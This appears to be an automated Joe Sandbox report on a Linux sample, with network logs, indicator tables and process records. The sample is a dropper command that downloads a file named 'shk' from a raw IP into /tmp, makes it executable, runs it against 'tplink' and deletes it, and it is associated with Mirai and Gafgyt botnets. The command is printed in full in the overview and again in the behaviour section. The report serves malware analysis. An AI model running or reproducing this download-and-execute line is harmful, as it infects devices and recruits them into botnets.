Edit tour
Linux
Analysis Report
Overview
Detection
Score: | 1 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Executes the "rm" command used to delete files or directories
Executes the "wget" command typically used for HTTP/S downloading
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Classification
Analysis Advice
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work. |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1417455 |
Start date and time: | 2024-03-29 10:32:33 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 27s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxcmdlinecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Detection: | CLEAN |
Classification: | clean1.lin@0/0@0/0 |
Command: | /bin/sh -c "cd /tmp; rm -rf shk; wget http:/89.190.156.173/shk; chmod 777 shk; ./shk tplink; rm -rf shk" |
PID: | 6220 |
Exit Code: | |
Exit Code Info: | |
Killed: | True |
Standard Output: | |
Standard Error: | --2024-03-29 10:33:08-- http://89.190.156.173/shk |
⊘No yara matches
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
There are no malicious signatures, click here to show all signatures.
Source: | Wget executable: | Jump to behavior |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | Classification label: |
Source: | Rm executable: | Jump to behavior |
Source: | Wget executable: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | 1 File Deletion | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
⊘No configs have been found
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
⊘No contacted domains info
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
89.190.156.173 | unknown | United Kingdom | 7489 | HOSTUS-GLOBAL-ASHostUSHK | false | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
109.202.202.202 | Get hash | malicious | Gafgyt, Mirai | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai, Gafgyt | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
91.189.91.43 | Get hash | malicious | Gafgyt, Mirai | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai, Gafgyt | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
91.189.91.42 | Get hash | malicious | Gafgyt, Mirai | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai, Gafgyt | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Gafgyt, Mirai | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt | Browse |
| ||
CANONICAL-ASGB | Get hash | malicious | Gafgyt, Mirai | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt | Browse |
| ||
INIT7CH | Get hash | malicious | Gafgyt, Mirai | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
HOSTUS-GLOBAL-ASHostUSHK | Get hash | malicious | GuLoader | Browse |
| |
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
|
⊘No context
⊘No context
⊘No created / dropped files found
⊘No static file info
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 29, 2024 10:33:08.752141953 CET | 36504 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:33:09.772527933 CET | 36504 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:33:11.212419033 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Mar 29, 2024 10:33:11.788326025 CET | 36504 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:33:15.819755077 CET | 36504 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:33:16.843605042 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Mar 29, 2024 10:33:18.379547119 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Mar 29, 2024 10:33:24.010555983 CET | 36504 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:33:32.457366943 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Mar 29, 2024 10:33:40.136331081 CET | 36504 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:33:42.695974112 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Mar 29, 2024 10:33:48.839250088 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Mar 29, 2024 10:34:13.411706924 CET | 36504 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:34:13.411705971 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Mar 29, 2024 10:34:33.888701916 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Mar 29, 2024 10:35:19.950126886 CET | 36506 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:35:20.954165936 CET | 36506 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:35:22.969788074 CET | 36506 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:35:27.129270077 CET | 36506 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:35:35.320091963 CET | 36506 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:35:51.445890903 CET | 36506 | 80 | 192.168.2.23 | 89.190.156.173 |
Mar 29, 2024 10:36:24.465286970 CET | 36506 | 80 | 192.168.2.23 | 89.190.156.173 |
System Behavior
Start time (UTC): | 09:33:08 |
Start date (UTC): | 29/03/2024 |
Path: | /bin/sh |
Arguments: | /bin/sh -c "cd /tmp; rm -rf shk; wget http://89.190.156.173/shk; chmod 777 shk; ./shk tplink; rm -rf shk" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:33:08 |
Start date (UTC): | 29/03/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:33:08 |
Start date (UTC): | 29/03/2024 |
Path: | /usr/bin/rm |
Arguments: | rm -rf shk |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
Start time (UTC): | 09:33:08 |
Start date (UTC): | 29/03/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:33:08 |
Start date (UTC): | 29/03/2024 |
Path: | /usr/bin/wget |
Arguments: | wget http://89.190.156.173/shk |
File size: | 548568 bytes |
MD5 hash: | 996940118df7bb2aaa718589d4e95c08 |